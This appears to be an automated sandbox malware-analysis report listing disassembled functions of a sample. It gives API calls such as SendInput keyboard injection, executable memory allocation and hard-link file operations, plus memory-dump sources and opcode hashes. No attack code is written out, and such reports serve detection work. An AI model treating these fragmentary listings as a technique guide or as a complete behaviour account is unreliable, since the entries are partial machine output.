                                    Function 008F90E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,008F8CF4,?,0090F910), ref: 008F90EE
                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 008F9100
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetModuleHandleExW$kernel32.dll
                                    • API String ID: 2574300362-199464113
                                    • Opcode ID: 910101a80ed4f20c07a7e8bfba9ae1ccb56cfb3b5107b0a85cc7a4f6d25dbea1
                                    • Instruction ID: e136986e3c66535bb99f45602a2e54060708bc8b11b1fa999102db4ae4e45157
                                    • Opcode Fuzzy Hash: 910101a80ed4f20c07a7e8bfba9ae1ccb56cfb3b5107b0a85cc7a4f6d25dbea1
                                    • Instruction Fuzzy Hash: ACD01734528713CFDB309F31D82861676E8FF05355B12887AE6C6D69A0EA74C8C0CA90
                                    Function 008C1714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: LocalTime__swprintf
                                    • String ID: %.3d$WIN_XPe
                                    • API String ID: 2070861257-2409531811
                                    • Opcode ID: 0f18b073e0334a8ab2eae23c85880fcbe52abf108abe193b5828aee5ae808216
                                    • Instruction ID: 79c4c728c221e4fbea9db52071ba87706dbe67b48e10e778b63d91f1be4d2e0d
                                    • Opcode Fuzzy Hash: 0f18b073e0334a8ab2eae23c85880fcbe52abf108abe193b5828aee5ae808216
                                    • Instruction Fuzzy Hash: 7CD0177180910DEACF11DB9098CCEB9737CFB1A309F14046AB402E2446E231CB94EB61
                                    Function 008D717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 62b97e2174a0d0e7c404b9b94987d6ca69b5ecfdc7e534658c7da1b6568dd7e3
                                    • Instruction ID: 3e08fe44071d9a96aa13be39e780bf51b784434105c32e1f31afa055175006ee
                                    • Opcode Fuzzy Hash: 62b97e2174a0d0e7c404b9b94987d6ca69b5ecfdc7e534658c7da1b6568dd7e3
                                    • Instruction Fuzzy Hash: 74C16074A0421AEFCB14CF94C884EAEBBB5FF48714B558699E805EB351E730ED81DB90
                                    Function 008FE02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CharLowerBuffW.USER32(?,?), ref: 008FE0BE
                                    • CharLowerBuffW.USER32(?,?), ref: 008FE101
                                      • Part of subcall function 008FD7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 008FD7C5
                                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 008FE301
                                    • _memmove.LIBCMT ref: 008FE314
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: BuffCharLower$AllocVirtual_memmove
                                    • String ID:
                                    • API String ID: 3659485706-0
                                    • Opcode ID: 6ecceffbef17775d357cbda0cb09eef6f001bfd5a97de7e050aabd23d26ad4f4
                                    • Instruction ID: 57f48a2a5be94fb6696d270dfe919a7da40d5d25f8df65f8f57871d0248f1788
                                    • Opcode Fuzzy Hash: 6ecceffbef17775d357cbda0cb09eef6f001bfd5a97de7e050aabd23d26ad4f4
                                    • Instruction Fuzzy Hash: 26C126716083059FC714DF28C480A6ABBE4FF89718F14896EF999DB361D731E946CB82
                                    Function 008F8093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                    Download Yara Rule
                                    APIs
                                    • CoInitialize.OLE32(00000000), ref: 008F80C3
                                    • CoUninitialize.COMBASE ref: 008F80CE
                                      • Part of subcall function 008DD56C: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 008DD5D4
                                    • VariantInit.OLEAUT32(?), ref: 008F80D9
                                    • VariantClear.OLEAUT32(?), ref: 008F83AA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                    • String ID:
                                    • API String ID: 780911581-0
                                    • Opcode ID: 626cea1fe5b16444864b44f025a0591400a32dffac6e76844c28865f51de1aee
                                    • Instruction ID: c3ffd626d1f98126262a4f839ac6b11d0b08c4d72e5968f3f1e259851b84e0ad
                                    • Opcode Fuzzy Hash: 626cea1fe5b16444864b44f025a0591400a32dffac6e76844c28865f51de1aee
                                    • Instruction Fuzzy Hash: 4CA126356047069FDB10EF68C881A2AB7E4FF89714F184558FA9ADB3A1CB30ED45CB42
                                    Function 008D7530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                    Download Yara Rule
                                    APIs
                                    • ProgIDFromCLSID.COMBASE(?,00000000), ref: 008D76EA
                                    • CoTaskMemFree.COMBASE(00000000), ref: 008D7702
                                    • CLSIDFromProgID.COMBASE(?,?), ref: 008D7727
                                    • _memcmp.LIBCMT ref: 008D7748
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: FromProg$FreeTask_memcmp
                                    • String ID:
                                    • API String ID: 314563124-0
                                    • Opcode ID: b92887b99b9ad98c0af6b889f2f210f9052dd236295f4157418f2f1eb288c72b
                                    • Instruction ID: a6f7eabff3d0d88fb428f8c15971daf02beac53f61183ebf61be51e1fae6920d
                                    • Opcode Fuzzy Hash: b92887b99b9ad98c0af6b889f2f210f9052dd236295f4157418f2f1eb288c72b
                                    • Instruction Fuzzy Hash: 8B811C75A00109EFCB04DFA8C984DEEB7B9FF89315F204559E516EB250EB71AE06CB60
                                    Function 008D687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Variant$AllocClearCopyInitString
                                    • String ID:
                                    • API String ID: 2808897238-0
                                    • Opcode ID: fe67372f2587ce521dd47f25c8ba85c6c268f85265ac4ced992d138549970706
                                    • Instruction ID: aebd328a53c1e40b9aed6f24a675c4cb9219489a0a6ca919fab18f29761e9e57
                                    • Opcode Fuzzy Hash: fe67372f2587ce521dd47f25c8ba85c6c268f85265ac4ced992d138549970706
                                    • Instruction Fuzzy Hash: A351B3746043099EDB24AF69D891A3AB7E5FF45314F20C91FE5C6DB791FA30D8A08702
                                    Function 009097F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetWindowRect.USER32(0156DEF0,?), ref: 00909863
                                    • ScreenToClient.USER32(00000002,00000002), ref: 00909896
                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00909903
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Window$ClientMoveRectScreen
                                    • String ID:
                                    • API String ID: 3880355969-0
                                    • Opcode ID: 42841a40947d670f8bbe55e5123951894a3916408d482035948060ed30f804bb
                                    • Instruction ID: ec30eafd1bb4a1cc9cb56a02976952ef950408a5b9fab0758c6f44d742afcce9
                                    • Opcode Fuzzy Hash: 42841a40947d670f8bbe55e5123951894a3916408d482035948060ed30f804bb
                                    • Instruction Fuzzy Hash: F6513035A00209EFCF14DF58C884AAE7BB9FF56360F148159F8659B3A1D731AD81DB90
                                    Function 008D9A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 008D9AD2
                                    • __itow.LIBCMT ref: 008D9B03
                                      • Part of subcall function 008D9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 008D9DBE
                                    • SendMessageW.USER32(?,0000110A,00000001,?), ref: 008D9B6C
                                    • __itow.LIBCMT ref: 008D9BC3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessageSend$__itow
                                    • String ID:
                                    • API String ID: 3379773720-0
                                    • Opcode ID: a51e60aefeef062108bea10338ba57e5a255bf50279c20b81a8ccea64e7dbc7e
                                    • Instruction ID: 1a5434c48873e29901f6f7db3d83f124e89c6e73e580ffb5257505c46f8130fe
                                    • Opcode Fuzzy Hash: a51e60aefeef062108bea10338ba57e5a255bf50279c20b81a8ccea64e7dbc7e
                                    • Instruction Fuzzy Hash: 34416F74A00218ABDF21EF58D845BAEBFB9FF45724F00015AF945E7391DB709A44CB52
                                    Function 008EB7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 008EB89E
                                    • GetLastError.KERNEL32(?,00000000), ref: 008EB8C4
                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 008EB8E9
                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 008EB915
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                    • String ID:
                                    • API String ID: 3321077145-0
                                    • Opcode ID: d77d71371a89bb7e3794112361a626bcd62948ccd05e7df69cb50f16a96ca936
                                    • Instruction ID: b1d09e383efe521b410b67747a7c04aaa4f6a3b7f71bc7321482a0806c881c79
                                    • Opcode Fuzzy Hash: d77d71371a89bb7e3794112361a626bcd62948ccd05e7df69cb50f16a96ca936
                                    • Instruction Fuzzy Hash: B541FB35600552DFCB11EF19C455A6ABBE1FF4A314F198098ED8A9B762CB30FD01DB92
                                    Function 00908851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                    Download Yara Rule
                                    APIs
                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009088DE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: InvalidateRect
                                    • String ID:
                                    • API String ID: 634782764-0
                                    • Opcode ID: 288aa17570063a60aa183013bd55b0568f03751b34771ee2cf3756346dbe3edb
                                    • Instruction ID: 9badf8312be947274fef0e59558225ceb4f7ae90070143cbc6d6800b23f7fcf4
                                    • Opcode Fuzzy Hash: 288aa17570063a60aa183013bd55b0568f03751b34771ee2cf3756346dbe3edb
                                    • Instruction Fuzzy Hash: 5331D434714108EFEB24AA58CC45FBE77A9EB06350F544512F9B1E62E1CE71D980AB52
                                    Function 0090AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • ClientToScreen.USER32(?,?), ref: 0090AB60
                                    • GetWindowRect.USER32(?,?), ref: 0090ABD6
                                    • PtInRect.USER32(?,?,0090C014), ref: 0090ABE6
                                    • MessageBeep.USER32(00000000), ref: 0090AC57
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Rect$BeepClientMessageScreenWindow
                                    • String ID:
                                    • API String ID: 1352109105-0
                                    • Opcode ID: ab615141ee127971dbde1e146fb1b8990aee66124641f58b0f3f2adb95517ca3
                                    • Instruction ID: 9dc915eec0ce2d10944761762c1f6bf9a0b48d8e7d91c8646e2fc9521c965ac3
                                    • Opcode Fuzzy Hash: ab615141ee127971dbde1e146fb1b8990aee66124641f58b0f3f2adb95517ca3
                                    • Instruction Fuzzy Hash: 6041AE34604229DFDB21DF58C884BA97BF9FF49300F1A80A9E854DB2A1D730E941DBD2
                                    Function 008E0AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 008E0B27
                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 008E0B43
                                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 008E0BA9
                                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 008E0BFB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: KeyboardState$InputMessagePostSend
                                    • String ID:
                                    • API String ID: 432972143-0
                                    • Opcode ID: d75716ae868f29365904cb7e0b5631603db80f166f8d36bce4f7fd1ae18063d0
                                    • Instruction ID: bfaa2d2aa31c06de4dee82e35fcf065b1564c97621f1c0f06ca0756c26505547
                                    • Opcode Fuzzy Hash: d75716ae868f29365904cb7e0b5631603db80f166f8d36bce4f7fd1ae18063d0
                                    • Instruction Fuzzy Hash: D7314A309442886EEB308B668C05BF9BBA9FB86328F144B5AF581D11D1C3F489C09F51
                                    Function 008E0C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 008E0C66
                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 008E0C82
                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 008E0CE1
                                    • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 008E0D33
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: KeyboardState$InputMessagePostSend
                                    • String ID:
                                    • API String ID: 432972143-0
                                    • Opcode ID: e5336545d739ad8e1248e93a984661a5b2aa7bfa5d02c9cc53f0a26c4cd29e50
                                    • Instruction ID: 7a6aad60efaa692f1afca4b19a31a4a5ce6606a0cef6c9d2e9851396bcd72bed
                                    • Opcode Fuzzy Hash: e5336545d739ad8e1248e93a984661a5b2aa7bfa5d02c9cc53f0a26c4cd29e50
                                    • Instruction Fuzzy Hash: DB314830A0429C6EFF308B6A8C147FEBB66FB47310F244B1AE481D21D1C3B999C59B52
                                    Function 008B61C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 008B61FB
                                    • __isleadbyte_l.LIBCMT ref: 008B6229
                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 008B6257
                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 008B628D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                    • String ID:
                                    • API String ID: 3058430110-0
                                    • Opcode ID: aff2a6561c96c76ed8503d49d8ac30d82916a6c0f479e24fc08038d790bd1ead
                                    • Instruction ID: 76b7365d9f3508190afa397536cbcb66a513a3569d52436078d682eaf314d923
                                    • Opcode Fuzzy Hash: aff2a6561c96c76ed8503d49d8ac30d82916a6c0f479e24fc08038d790bd1ead
                                    • Instruction Fuzzy Hash: EE31AE31A04246AFEF218F69CC44BBA7BA9FF42310F154029E864D72A1E735D961DB90
                                    Function 00904EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetForegroundWindow.USER32 ref: 00904F02
